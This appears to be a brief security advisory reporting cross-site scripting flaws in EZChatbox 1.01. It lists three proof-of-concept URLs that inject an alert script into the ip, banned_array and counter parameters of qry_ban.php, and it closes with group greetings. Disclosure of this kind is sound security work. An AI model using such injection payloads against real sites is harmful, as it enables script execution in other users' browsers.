EZChatbox version 1.01 suffers from cross site scripting vulnerabilities.
0770bdbf7da69f9375370f70350ccbeceaf555c6b611eabda8a3347492e93247
~~~~~~~~~~~~~~~~~~~~~~~~
~ EZChatbox 1.01 XSS ~
~~~~~~~~~~~~~~~~~~~~~~~~
---------------------
Author : ShAy6oOoN
---------------------
Group : PitBull Crew
---------------------
Script : EZChatbox 1.01
---------------------
Download : http://downloads.sourceforge.net/ezchatbox/EzChatBox-1.01.zip?modtime=1115115847&big_mirror=0
---------------------
Vulnerability Type : Cross Site Scripting
---------------------
Register_globals : On
---------------------
http://localhost/EzChatBox/EzChatBox/qry_ban.php?ip=<script>alert(123);</script>
http://localhost/EzChatBox/EzChatBox/qry_ban.php?banned_array=<script>alert(123);</script>
http://localhost/EzChatBox/EzChatBox/qry_ban.php?counter=<script>alert(123);</script>
Greetings:
----------
PitBull Crew : The_PitBull - iNs - c0ol - Raz0r
Thanks To:
----------
packetstormsecurity.org